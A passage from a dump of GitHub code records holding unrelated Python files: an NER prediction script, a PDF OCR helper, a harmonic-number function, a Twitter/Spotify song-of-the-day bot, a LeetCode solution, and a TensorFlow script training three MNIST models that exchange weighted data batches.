valid.read_data(data=r'C:\\Users\\Rah12937\\PycharmProjects\\mconer\\multiconer2023\\train_dev\\en-dev.conll')\n with open('valid_load.pkl', 'wb') as f:\n pickle.dump(valid, f)\ndef calculate_macro_f1(label_file, pred_file):\n labels = [field for field in get_ner_reader(label_file)]\n preds = [field for field in get_ner_reader(pred_file)]\n\n # pdb.set_trace()\n\n pred_result = []\n label_result = []\n for pred, label in zip(preds, labels):\n print(pred_result)\n label_result.append(extract_spans(label[-1]))\n pred_result.append(extract_spans(pred[-1]))\n\n span_f1 = SpanF1()\n span_f1(pred_result, label_result)\n word_result = span_f1.get_metric()\n\n return word_result[\"macro@F1\"]\n\nfile_path = r'C:\\Users\\Rah12937\\PycharmProjects\\mconer\\multiconer2023\\train_dev\\en-dev.conll'\nmodel = NERmodelbase3(tag_to_id=mconern, device=device, encoder_model=encoder_model, dropout=0.3, use_lstm=True).to(\n device)\nmodel.load_state_dict(torch.load(r'C:\\Users\\Rah12937\\PycharmProjects\\mconer'\n r'\\runid_8303_EP_20_fine_xlm-b-birnnn-fl-0.8-sep_lr-alpha-2-gama-4'\n r'\\runid_8303_EP_20_fine_xlm-b-birnnn-fl-0.8-sep_lr-alpha-2-gama-4.pt'))\n\nvalidloader = DataLoader(valid, batch_size=32, collate_fn=collate_batch, num_workers=0)\nout_str = ''\n\neval_file = os.path.join('test_out.txt')\nfor batch in tqdm(validloader, total=1):\n outputs, focal_loss, all_prob, token_scores, mask, tags = model(batch, mode='predict')\n # convert to the required format for the user\n for idx, record in enumerate(batch[0]):\n # convert ids to token so that we can undertsnd the toke's behav\n words = tokenizer.convert_ids_to_tokens(record)\n preds = outputs['token_tags'][idx]\n slicer = [True if i.startswith('▁') else False for i in words[:len(preds)] ]\n filter_preds = np.array(preds)[np.array(slicer)]\n out_str += '\\n'.join(filter_preds)\n out_str += '\\n\\n'\nopen(eval_file, 'wt').write(out_str)\n\n# macro_f1_score = calculate_macro_f1(file_path, eval_file)\n# score_file = os.path.join('score_out.txt')\n# open(score_file, 'wt').write(str(macro_f1_score))","repo_name":"choudhary-shivani/mconer","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"10948657193","text":"\nimport pytesseract\nimport os\nimport matplotlib.pyplot as plt\nfrom pdf2image import convert_from_path\nfrom PyPDF2 import PdfFileMerger, PdfFileReader\nfrom io import FileIO as file\nimport json\n\ndef searchable_pdf(pdf_file):\n input_file_name = os.path.basename(pdf_file).split(\".\")[0]\n output_file_name = input_file_name + \"_converted.pdf\"\n images = convert_from_path(pdf_file)\n pdf_pages = [pytesseract.image_to_pdf_or_hocr(image, extension='pdf') for image in images]\n with open(output_file_name, \"wb\") as f:\n f.write(pdf_pages[0])\n if len(pdf_pages)>1:\n for i in range(len(pdf_pages)-1):\n with open(\"append.pdf\", \"wb\") as f:\n f.write(pdf_pages[i+1])\n merger = PdfFileMerger()\n merger.append(PdfFileReader(file(output_file_name, 'rb')))\n merger.append(PdfFileReader(file(\"append.pdf\", 'rb')))\n merger.write(output_file_name)\n os.remove(\"append.pdf\")\n print(\"searchable pdf created\")\n\n\ndef extract_text(pdf_file):\n input_file_name = os.path.basename(pdf_file).split(\".\")[0]\n output_file_name = input_file_name + \".json\"\n images = convert_from_path(pdf_file)\n txt_pages = [pytesseract.image_to_string(image) for image in images]\n with open(output_file_name, 'w') as f:\n json.dump(txt_pages, f)\n print(\"text extracted into json file\")\n","repo_name":"sangramz/PDF_OCR","sub_path":"app_main/tesseract_ocr.py","file_name":"tesseract_ocr.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"11810882892","text":"import logging\n\n\ndef harmonic(input_number):\n \"\"\"\n function harmonic: calculate and print harmonic value\n :param input_number: int,enter n-th harmonic number\n :return:\n \"\"\"\n try:\n logging.basicConfig(filename='myapp.log', level=logging.INFO)\n logging.info(\"Started Harmonic Number\")\n harms = 1\n for i in range(2, input_number + 1):\n harms += 1 / i\n print(harms)\n logging.info(\"Finished Harmonic Number\")\n except ArithmeticError:\n logging.error(ArithmeticError)\n print(ArithmeticError)\n\n\nif __name__ == '__main__':\n number = int(input(\"Enter N-th Harmonic Number: \"))\n harmonic(input_number=number)\n","repo_name":"AshishP2000/Python_basic_programs","sub_path":"logical_programming/harmonic_number.py","file_name":"harmonic_number.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"17262953308","text":"# troy_bot_test.py\nimport sys\nimport os\nimport time\nimport random\nimport tweepy\nimport spotipy\nfrom spotipy import oauth2\nimport spotipy.util as util\nfrom spotipy.oauth2 import SpotifyClientCredentials\n# from credentials import *\nfrom os import environ\n\n# for heroku integration\nCONSUMER_KEY = environ['CONSUMER_KEY']\nCONSUMER_SECRET = environ['CONSUMER_SECRET']\nACCESS_TOKEN = environ['ACCESS_TOKEN']\nACCESS_TOKEN_SECRET = environ['ACCESS_TOKEN_SECRET']\nSPOTIFY_CLIENT_ID = environ['SPOTIFY_CLIENT_ID']\nSPOTIFY_CLIENT_SECRET = environ['SPOTIFY_CLIENT_SECRET']\n\n# TODO: figure out spotify authorization thru heroku problem\n# TODO: need to clean up code where ever i can\n\n### Global Variables ###\n# Time interval for tweets (one per day - every 24 hours)\nINTERVAL = 60 * 60 * 24\n\n# set up OAuth and integrate with API; twitter test\nredirect_uri = \"http://localhost:8080\"\nauth = tweepy.OAuthHandler(CONSUMER_KEY, CONSUMER_SECRET)\nauth.set_access_token(ACCESS_TOKEN, ACCESS_TOKEN_SECRET)\ntweepy_api = tweepy.API(auth)\n\n# user_uri = 'spotify:user:1250284673'\n# username = user_uri.split(':')[2]\nusername = 'spotify:user:1250284673'.split(':')[2]\nscope = 'playlist-modify-public'\n\ntoken = util.prompt_for_user_token(\n username=username,\n scope=scope,\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n redirect_uri=redirect_uri)\n\n# sp = spotipy.Spotify(auth_manager=spotipy.SpotifyOAuth(\n# username=username,\n# client_id=SPOTIFY_CLIENT_ID,\n# client_secret=SPOTIFY_CLIENT_SECRET,\n# redirect_uri=redirect_uri,\n# scope='playlist-modify-public'))\n\nsp = spotipy.Spotify(auth=token)\n\n# playlist used for final version\n# playlist_uri = 'spotify:playlist:2AVp8hX9Xaiqg9xv8qp68v'\n# playlist to test if limit condition will be performed\nplaylist_uri = 'spotify:playlist:4CneB3XScAKgQseSXey2Yx'\nat_uri = 'spotify:playlist:3b64drC4E4qkcmiOs3cJaQ'\n\nplaylist_id = playlist_uri.split(':')[2]\nat_id = at_uri.split(':')[2]\n\nclass SpotifyTwitterBot:\n\n def __init__(self):\n self.twitter_playlist = sp.user_playlist(username,playlist_id)\n self.at_playlist = sp.user_playlist(username,at_id)\n\n def tweeted_check2(self, item):\n if any(song['track']['uri'] == item['track']['uri'] for song in self.at_playlist['tracks']['items']):\n return True\n else:\n print(\"Adding song to Tweeted playlist...\")\n print(item['track']['uri'])\n sp.user_playlist_add_tracks(username, at_id, [item['track']['uri']]) # need to test\n print(\"Removing song from test playlist...\")\n sp.user_playlist_remove_all_occurrences_of_tracks(username, playlist_id,[item['track']['uri']]) # also need to test\n return False\n\n # retrieves random song from playlist to send to tweet\n def get_random_song(self):\n # sp = spotipy.Spotify(auth_manager=spotipy.SpotifyOAuth(\n # username=username,\n # client_id=SPOTIFY_CLIENT_ID,\n # client_secret=SPOTIFY_CLIENT_SECRET,\n # redirect_uri=redirect_uri,\n # scope='playlist-modify-public'))\n\n token = util.prompt_for_user_token(\n username=username,\n scope=scope,\n client_id=SPOTIFY_CLIENT_ID,\n client_secret=SPOTIFY_CLIENT_SECRET,\n redirect_uri=redirect_uri)\n sp = spotipy.Spotify(auth=token)\n\n self.twitter_playlist = sp.user_playlist(username, playlist_id) # retrieve most recent version of playlist\n self.at_playlist = sp.user_playlist(username, at_id) # retrieve most recent version of TWEETED playlist\n tracks = self.twitter_playlist['tracks']\n\n item = random.choice(tracks['items'])\n\n # need to test using already tweeted playlist\n while self.tweeted_check2(item):\n print(\"Already tweeted. Searching again...\")\n item = random.choice(tracks['items'])\n \n # composes string to send for tweet\n tweet_string = \"[testing] sotd: {0} by {1}\\n{2}\".format(item['track']['name'], item['track']['artists'][0]['name'], item['track']['external_urls']['spotify'])\n print(tweet_string)\n self.at_playlist = sp.user_playlist(username, at_id)\n print(\"number of songs already tweeted: {0} out of {1} songs\".format(self.at_playlist['tracks']['total'], tracks['total']))\n\n tweepy_api.update_status(status=tweet_string)\n\ndef main():\n\n bot1 = SpotifyTwitterBot()\n # test_interval = 60 # 60 sec interval (for testing w heroku to see behavior)\n test_interval = 60 * 45 # 45 minute interval\n # test_interval2 = 60 * 60 * 6 # 6 hour interval\n\n while bot1.at_playlist['tracks']['total'] <= bot1.twitter_playlist['tracks']['total']:\n bot1.get_random_song()\n time.sleep(test_interval) # time interval to test with heroku deployment\n # time.sleep(INTERVAL)\n if bot1.at_playlist['tracks']['total'] == bot1.twitter_playlist['tracks']['total']:\n break\n\n if bot1.at_playlist['tracks']['total'] >= bot1.twitter_playlist['tracks']['total']:\n tweet_string = \"all songs from this playlist have been tweeted! thanks for the good time... \\U0000270C\"\n \n print(tweet_string)\n tweepy_api.update_status(tweet_string)\n\nif __name__ == '__main__':\n main()","repo_name":"troymead/twitter_bot","sub_path":"troy_bot.py","file_name":"troy_bot.py","file_ext":"py","file_size_in_byte":5950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21706795716","text":"\"\"\"This is a test module where several methods are defined\"\"\"\n# magic methods\n__name__ = \"Test\"\n__revision__ = \"1.2.1\"\n__func__ = \"test_enumerator()\"\n\n\n\n\n\n\n\n\n\nNUM_LIST = [1, 2, 8, 79]\nrv = \"Length of num list: {} \".format(len(NUM_LIST))\n# print(rv)\n\ndef test_enumerator(numbr_list):\n \"\"\"Test enumerate\"\"\"\n for i, item in enumerate(numbr_list):\n print(\"index \" + str(i) + \" item \" + str(item))\n\ndef test_range():\n \"\"\"Test range\"\"\"\n for item_x in range(6):\n print(item_x)\n\ndef test_zip():\n \"\"\"test zip\"\"\"\n x = [1, 2, 3]\n y = [4, 5, 6]\n zipped = zip(x, y)\n for item_x in zipped:\n print(item_x)\n print(item_x[0])\n\ndef check_greeting(data_in):\n rv = \"\"\n input_hi = [\"hi\", \"hello\", \"good day\", \"greetings\", \"how\"]\n for x in input_hi:\n if x == data_in.lower():\n rv = \"yes\"\n return rv\n\nprint(check_greeting(\"hi\"))\n# test_zip()\n\n# y = \"128\"\n# print(type(y))\n# x = int(y)\n# print(type(x))\n# test_zip()\n# test_range()\n# test_enumerator(NUM_LIST)\n","repo_name":"spawnmarvel/TSK_testit.tech","sub_path":"app/test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"13086991995","text":"class Solution:\n def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:\n hLarge = self.largestCut(h, horizontalCuts)\n vLarge = self.largestCut(w, verticalCuts)\n return (hLarge*vLarge)%1000000007\n\n def largestCut(self, l: int, cuts: List[int]) -> int:\n cuts.sort()\n lastCut = 0\n largeCut = -1\n for c in cuts:\n cut = c-lastCut\n if cut > largeCut:\n largeCut = cut\n lastCut = c\n\n cut = l - lastCut\n if cut > largeCut:\n largeCut = cut\n return largeCut","repo_name":"ragilr/leetcode","sub_path":"lcc-june2021/maximum-area-of-a-piece-of-cake-after-horizontal-and-vertical-cuts.py","file_name":"maximum-area-of-a-piece-of-cake-after-horizontal-and-vertical-cuts.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"25235144845","text":"import tensorflow as tf\nimport functools\nINPUT_NODE = 784\nOUTPUT_NODE = 10\n\nLAYER1_NODE = 500\nBATCH_SIZE = 100\nWEIGHT_INIT = 1.#初始化所有来源样本的权重\nWEIGHT_THRESHOLD = 1.0 #阻止节点之间的数据传输\nDISTRIBUTE_NODE_NUM = 2 #参与的节点数目\nTRANSFER_FRE = 100 #相互传输的instance的频率,应该也是可以更改的\n\nLEARNING_RATE_BASE = 0.8\nLEARNING_RATE_DECAY = 0.99\nREGULARIZATION_RATE = 0.0001\nTRAINING_STEPS = 10000\nMOVING_AVERAGE_DECAY = 0.99\n\nlog_dir='./logs/T1.2/Model/'\nlog_dir1='./logs/T1.2/Model1/'\nlog_dir2='./logs/T1.2/Model2/'\nlog_tst ='./logs/T1.2/Test/'\ndef lazy_property(function):\n attribute = '_cache_' + function.__name__\n\n @property\n @functools.wraps(function)\n def decorator(self):\n if not hasattr(self, attribute):\n with self.graph.as_default():\n with tf.variable_scope(function.__name__):\n setattr(self, attribute, function(self))\n return getattr(self, attribute)\n\n return decorator\n\nclass Model:\n\n def __init__(self):\n self.graph = tf.Graph()\n self.x\n self.y_\n self.w\n self.x_transfer\n self.y_transfer\n self.weights1\n self.weights2\n self.biases1\n self.biases2\n self.global_step\n self.init_op\n self.train_step\n self.accuracy\n self.loss\n self.weights_node_update\n self.transfer_weight_1\n self.transfer_weight_2\n\n self.scalar_acc\n self.scalar_weight_1\n self.scalar_weight_2\n self.scalar_loss\n\n #模型输入 shape = [None, Input]其中None表示batch_size大小\n @lazy_property\n def x(self):\n return tf.placeholder(tf.float32, [None, INPUT_NODE], name = 'x-input')\n @lazy_property\n def y_(self):\n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y-input')\n @lazy_property\n def w(self): \n return tf.placeholder(tf.float32, [None, ], name = 'all-instance-weight-local')\n #to calculate the loss of a transferred BATCH, then adjust 'weights_node_1' for network\n @lazy_property\n def x_transfer(self):\n return tf.placeholder(tf.float32, [None, INPUT_NODE], name = 'transfer-x-input')\n @lazy_property\n def y_transfer(self): \n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'transfer-y-input')\n\n #隐藏层参数 @lazy_property\n @lazy_property\n def weights1(self):\n return tf.Variable(\n tf.truncated_normal([INPUT_NODE, LAYER1_NODE], stddev = 0.1) #初始化\n )\n @lazy_property\n def biases1(self):\n return tf.Variable(\n tf.constant(0.1, shape = [LAYER1_NODE])\n )\n @lazy_property\n def weights2(self):\n return tf.Variable(\n tf.truncated_normal([LAYER1_NODE, OUTPUT_NODE], stddev = 0.1)\n )\n @lazy_property\n def biases2(self):\n return tf.Variable(\n tf.constant(0.1, shape = [OUTPUT_NODE])\n )\n\n def inference(self, input_tensor, weights1, biases1,\n weights2, biases2):\n layer1 = tf.nn.relu(tf.matmul(input_tensor, weights1) + biases1)\n return (tf.matmul(layer1, weights2) + biases2)\n\n @lazy_property\n def y(self):\n return self.inference(input_tensor = self.x, weights1 = self.weights1\n , biases1 = self.biases1, weights2 = self.weights2, biases2 = self.biases2)\n\n @lazy_property\n def global_step(self):\n return tf.Variable(0, trainable=True)\n @lazy_property\n def cross_entropy_mean(self):\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\n logits = self.y, labels = tf.argmax(self.y_,1)\n )\n weighted_cross_entropy = tf.multiply(cross_entropy, self.w)\n cross_entropy_mean = tf.reduce_mean(weighted_cross_entropy) \n return cross_entropy_mean\n @lazy_property\n def loss(self):\n regularizer = tf.contrib.layers.l2_regularizer(REGULARIZATION_RATE)\n regularization = regularizer(self.weights1) + regularizer(self.weights2)\n return self.cross_entropy_mean + regularization\n\n\n @lazy_property \n def learning_rate(self):\n learning_rate = tf.train.exponential_decay(\n LEARNING_RATE_BASE, # 基础的学习率,随着迭代的进行,更新变量时使用的\n # 学习率在这个基础上递减\n self.global_step, # 当前迭代的轮数\n # mnist.train.num_examples / BATCH_SIZE, # 过完所有的训练数据需要的迭代次数\n 1000,\n LEARNING_RATE_DECAY # 学习率的衰减速度\n )\n return learning_rate\n @lazy_property \n def train_step(self):\n train_step = tf.train.GradientDescentOptimizer(self.learning_rate).minimize(self.loss\n , global_step=self.global_step)\n return train_step\n @lazy_property\n def correct_prediction_float(self):\n correct_prediction = tf.equal(tf.argmax(self.y, 1), tf.argmax(self.y_, 1))\n # 注意这个accuracy是只跟average_y有关的,跟y是无关的\n # 这个运算首先讲一个布尔型的数值转化为实数型,然后计算平均值。这个平均值就是模型在这\n # 一组数据上的正确率 \n #用作validation和test——local\n correct_prediction_float = tf.cast(correct_prediction, tf.float32)\n return correct_prediction_float\n \n @lazy_property \n def accuracy(self):\n return tf.reduce_mean(self.correct_prediction_float)\n @lazy_property\n def accuracy_transfer_batch(self):\n #传输进来的一个batch的accuracy_transfer_batch\n y_transfer_infer = self.inference(input_tensor = self.x_transfer, weights1 = self.weights1\n , biases1 = self.biases1, weights2 = self.weights2, biases2 = self.biases2)\n correct_prediction_t = tf.equal(tf.argmax(y_transfer_infer, 1), tf.argmax(self.y_transfer, 1))\n correct_prediction_float_t = tf.cast(correct_prediction_t, tf.float32)\n accuracy_transfer_batch = tf.reduce_mean(correct_prediction_float_t)\n return accuracy_transfer_batch\n @lazy_property\n def accuracy_weighted_norm(self):\n #本地加权的acc,查看数据差异\n correct_prediction_float_weighted = tf.multiply(self.w, self.correct_prediction_float)\n accuracy_weighted = tf.reduce_sum(correct_prediction_float_weighted)\n accuracy_weighted_norm = tf.divide(accuracy_weighted, tf.reduce_sum(self.w))\n return accuracy_weighted_norm\n @lazy_property \n def weights_node_update(self):\n exp_ = tf.exp(1.0-self.accuracy_transfer_batch)\n weights_node_update = (self.accuracy_weighted_norm)*exp_\n return weights_node_update\n @lazy_property \n def transfer_weight_1(self):\n return self.weights_node_update\n @lazy_property\n def transfer_weight_2(self):\n return self.weights_node_update\n @lazy_property\n def scalar_loss(self):\n return tf.summary.scalar('loss', self.loss)\n @lazy_property\n def scalar_acc(self):\n return tf.summary.scalar('accuracy', self.accuracy)\n @lazy_property\n def scalar_weight_1(self):\n return tf.summary.scalar('transfer_weight_1', self.transfer_weight_1)\n @lazy_property\n def scalar_weight_2(self):\n return tf.summary.scalar('transfer_weight_2', self.transfer_weight_2)\n\n @lazy_property\n def init_op(self):\n return tf.initialize_all_variables()\n # @lazy_property\n # def prediction(self):\n # data_size = int(self.data.get_shape()[1])\n # target_size = int(self.target.get_shape()[1])\n # weight = tf.Variable(tf.truncated_normal([data_size, target_size]))\n # bias = tf.Variable(tf.constant(0.1, shape=[target_size]))\n # incoming = tf.matmul(self.data, weight) + bias\n # return tf.nn.softmax(incoming)\n\n # @lazy_property\n # def optimize(self):\n # cross_entropy = -tf.reduce_sum(self.target, tf.log(self.prediction))\n # optimizer = tf.train.RMSPropOptimizer(0.03)\n # return optimizer.minimize(cross_entropy)\n\n # @lazy_property\n # def error(self):\n # mistakes = tf.not_equal(\n # tf.argmax(self.target, 1), tf.argmax(self.prediction, 1))\n # return tf.reduce_mean(tf.cast(mistakes, tf.float32))\nclass ArgmaxModel:\n\n def __init__(self):\n self.graph = tf.Graph()\n self.y_test\n self.y1\n self.y2\n self.y3\n self.argmax\n self.correct_prediction\n self.accuracy\n self.scalar_acc\n @lazy_property\n def y1(self):\n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y1-input')\n\n @lazy_property\n def y2(self):\n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y2-input')\n\n @lazy_property\n def y3(self):\n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'y3-input')\n\n @lazy_property\n def y_test(self):\n return tf.placeholder(tf.float32, [None, OUTPUT_NODE], name = 'test-input')\n @lazy_property\n def argmax(self):\n prediction_prob_sum = self.y1 + self.y2 + self.y3\n return tf.arg_max(input=prediction_prob_sum, dimension=1)\n @lazy_property\n def correct_prediction(self):\n equal_num = tf.equal(tf.argmax(self.y_test, 1), self.argmax)\n return tf.cast(equal_num, tf.float32)\n @lazy_property\n def accuracy(self):\n return tf.reduce_mean(self.correct_prediction)\n @lazy_property\n def scalar_acc(self):\n return tf.summary.scalar('total_acc', self.accuracy)\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom tensorflow.contrib.learn.python.learn.datasets import mnist as MDataset\nimport numpy as np\nimport pandas as pd\nfrom tensorflow.python.framework import dtypes\nimport collections\nDatasets = collections.namedtuple('Datasets', ['train', 'validation', 'test'])\n\ndef extract_DF(datas,labels,weights):\n data = pd.DataFrame(datas)\n label = pd.DataFrame(labels)\n weight = pd.DataFrame(weights)\n frames = [data,label,weight]\n df = pd.concat(frames,axis=1,ignore_index=True)\n return df\n \n\ndef load_data():\n mnist = input_data.read_data_sets(\"./data\", one_hot=True)\n mnist_datasets_load = np.load('./data/mnist_3node_datasets.npz') \n mnist_datasets_load_even = mnist_datasets_load['mnist_even']\n mnist_datasets_load_odd = mnist_datasets_load['mnist_odd']\n mnist_datasets_load_mix = mnist_datasets_load['mnist_mix']\n mnist_odd = Datasets(train = mnist_datasets_load_odd[0], validation = mnist_datasets_load_odd[1], test = mnist_datasets_load_odd[2])\n mnist_even = Datasets(train = mnist_datasets_load_even[0], validation = mnist_datasets_load_even[1], test = mnist_datasets_load_even[2]) \n mnist_mix = Datasets(train = mnist_datasets_load_mix[0], validation = mnist_datasets_load_mix[1], test = mnist_datasets_load_mix[2])\n # weight = np.ones(shape = [train_labels.shape[0],],dtype=np.float32)\n\n mnist_odd_dataset = extract_DF(datas=mnist_odd.train.images,\n weights = np.ones(shape = [mnist_odd.train.images.shape[0],],dtype=np.float32),\n labels = mnist_odd.train.labels )\n mnist_even_dataset = extract_DF(datas=mnist_even.train.images,\n weights = np.ones(shape = [mnist_even.train.images.shape[0],],dtype=np.float32),\n labels = mnist_even.train.labels )\n mnist_mix_dataset = extract_DF(datas=mnist_mix.train.images,\n weights = np.ones(shape = [mnist_mix.train.images.shape[0],],dtype=np.float32),\n labels = mnist_mix.train.labels )\n mnist_all_test = extract_DF(datas=mnist.test.images,\n labels = mnist.test.labels,\n weights = np.ones(shape = [mnist.test.labels.shape[0],]))\n mnist_all_train = extract_DF(datas=mnist.train.images,\n labels = mnist.train.labels,\n weights = np.ones(shape = [mnist.train.labels.shape[0],]))\n return mnist_odd_dataset, mnist_even_dataset, mnist_mix_dataset, mnist_all_test, mnist_all_train\n\n\n\ndataset_0, dataset_1, dataset_2, test_data, train_all = load_data()\nM = Model()\nM1 = Model()\nM2 = Model()\nT = ArgmaxModel()\nsess = tf.Session(graph=M.graph)\nsess1 = tf.Session(graph=M1.graph)\nsess2 = tf.Session(graph=M2.graph)\nsess_tst = tf.Session(graph=T.graph)\n\nwriter = tf.summary.FileWriter(logdir = log_dir, graph = M.graph)\nwriter1 = tf.summary.FileWriter(logdir = log_dir1, graph = M1.graph)\nwriter2 = tf.summary.FileWriter(logdir = log_dir2, graph = M2.graph)\nwriter_tst = tf.summary.FileWriter(logdir = log_tst, graph = T.graph)\nsess.run(M.init_op)\nsess1.run(M1.init_op)\nsess2.run(M2.init_op)\n\ndef transfer(Graph, writer, session, \n dataset_0,\n dataset_1, dataset_2):\n global_step = session.run(Graph.global_step)\n transfer_1_=dataset_1.sample(n=BATCH_SIZE)\n transfer_2_=dataset_2.sample(n=BATCH_SIZE)\n local_0_ = dataset_0.sample(n=BATCH_SIZE)\n\n weights_update_feed_1 = {\n Graph.x_transfer: transfer_1_.iloc[:,range(INPUT_NODE)].as_matrix(),\n Graph.y_transfer: transfer_1_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(),\n Graph.x :local_0_.iloc[:,range(INPUT_NODE)].as_matrix(), \n Graph.y_:local_0_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n Graph.w: local_0_.iloc[:, INPUT_NODE+10].as_matrix()\n }\n weights_update_feed_2 = {\n Graph.x_transfer: transfer_2_.iloc[:,range(INPUT_NODE)].as_matrix(),\n Graph.y_transfer: transfer_2_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(),\n Graph.x :local_0_.iloc[:,range(INPUT_NODE)].as_matrix(), \n Graph.y_:local_0_.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n Graph.w: local_0_.iloc[:, INPUT_NODE+10].as_matrix()\n }\n scalar_weight_1, weights_node_1 = session.run([Graph.scalar_weight_1, Graph.transfer_weight_1], feed_dict=weights_update_feed_1 )\n scalar_weight_2, weights_node_2 = session.run([Graph.scalar_weight_2, Graph.transfer_weight_2], feed_dict=weights_update_feed_2 )\n writer.add_summary(scalar_weight_1,global_step)\n writer.add_summary(scalar_weight_2,global_step)\n #更新传送过来的batch中的weights\n transfer_1_.iloc[:, INPUT_NODE+10] = weights_node_1\n transfer_2_.iloc[:, INPUT_NODE+10] = weights_node_2\n return weights_node_1, weights_node_2, transfer_1_, transfer_2_\n\ndef feed(Graph, dataset, batch_size = BATCH_SIZE):\n feed = dataset.sample(n=batch_size)\n # feed = train_all.sample(n=BATCH_SIZE)\n local_feed_0 = {\n Graph.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n Graph.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n Graph.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n }\n return local_feed_0\ndef test_feed(y1,y2,y3,Graph,feed_data):\n pass\n# def train(Graph, local_set, session, )\nfor i in range(TRAINING_STEPS):\n ##=====================sample and feed training==========================\n # feed = dataset_0.sample(n=BATCH_SIZE)\n # # feed = train_all.sample(n=BATCH_SIZE)\n # local_feed_0 = {\n # M.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n # M.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n # M.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n # }\n local_feed_0 = feed(Graph = M, dataset = dataset_0)\n scalar_loss, _ = sess.run([M.scalar_loss, M.train_step], feed_dict=local_feed_0)\n writer.add_summary(scalar_loss,i)\n\n # feed = dataset_1.sample(n=BATCH_SIZE)\n # # feed = train_all.sample(n=BATCH_SIZE)\n # local_feed_1 = {\n # M1.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n # M1.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n # M1.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n # }\n local_feed_1 = feed(Graph = M1, dataset = dataset_1)\n scalar_loss1, _ = sess1.run([M1.scalar_loss, M1.train_step], feed_dict=local_feed_1)\n writer1.add_summary(scalar_loss1,i)\n\n # feed = dataset_2.sample(n=BATCH_SIZE)\n # # feed = train_all.sample(n=BATCH_SIZE)\n # local_feed_2 = {\n # M2.x: feed.iloc[:,range(INPUT_NODE)].as_matrix(), \n # M2.y_: feed.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix(), \n # M2.w: feed.iloc[:, INPUT_NODE+10].as_matrix()\n # }\n local_feed_2 = feed(Graph = M2, dataset = dataset_2)\n scalar_loss2, _ = sess2.run([M2.scalar_loss, M2.train_step], feed_dict=local_feed_2)\n writer2.add_summary(scalar_loss2,i)\n print(i)\n ##=====================ACCURACY==========================\n local_feed_0 = feed(Graph = M, dataset = test_data)\n scalar_acc, validate_acc = sess.run([M.scalar_acc, M.accuracy], feed_dict=local_feed_0)\n writer.add_summary(scalar_acc, i)\n\n local_feed_0 = feed(Graph = M1, dataset = test_data)\n scalar_acc, validate_acc = sess1.run([M1.scalar_acc, M1.accuracy], feed_dict=local_feed_0)\n writer1.add_summary(scalar_acc, i)\n\n local_feed_0 = feed(Graph = M2, dataset = test_data)\n scalar_acc, validate_acc = sess2.run([M2.scalar_acc, M2.accuracy], feed_dict=local_feed_0)\n writer2.add_summary(scalar_acc, i)\n ##=====================SUM ACC=============================\n feed_data = test_data.sample(n = BATCH_SIZE)\n feed_x = feed_data.iloc[:,range(INPUT_NODE)].as_matrix()\n feed_y_ = feed_data.iloc[:,range(INPUT_NODE, INPUT_NODE+10)].as_matrix()\n y0 = sess.run(M.y, feed_dict={M.x: feed_x})\n y1 = sess1.run(M1.y, feed_dict={M1.x: feed_x})\n y2 = sess2.run(M2.y, feed_dict={M2.x: feed_x})\n feed_test = {\n T.y1 : y0,\n T.y2 : y1,\n T.y3 : y2,\n T.y_test : feed_y_\n }\n scalar_acc_tst, tst_acc = sess_tst.run([T.scalar_acc, T.accuracy], feed_dict = feed_test)\n writer_tst.add_summary(scalar_acc_tst, i)\n print('test acc = ', tst_acc)\n ##=====================TRANSFER & UPDATE==========================\n if i%TRANSFER_FRE == 0 and i>=1 :\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M, writer = writer, session = sess, \n dataset_0 = dataset_0,\n dataset_1 = dataset_1, dataset_2 = dataset_2)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_0 = pd.concat([dataset_0, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_0 = pd.concat([dataset_0, transfer_2_], axis=0, ignore_index=True)\n weights_node_1, weights_node_2, transfer_1_, transfer_2_ = \\\n transfer(Graph = M1, writer = writer1, session = sess1, \n dataset_0 = dataset_1,\n dataset_1 = dataset_0, dataset_2 = dataset_2)\n if weights_node_1 > WEIGHT_THRESHOLD:\n dataset_1 = pd.concat([dataset_1, transfer_1_], axis=0, ignore_index=True)\n if weights_node_2 > WEIGHT_THRESHOLD:\n dataset_1 = pd.concat([dataset_1, transfer_2_], axis=0, 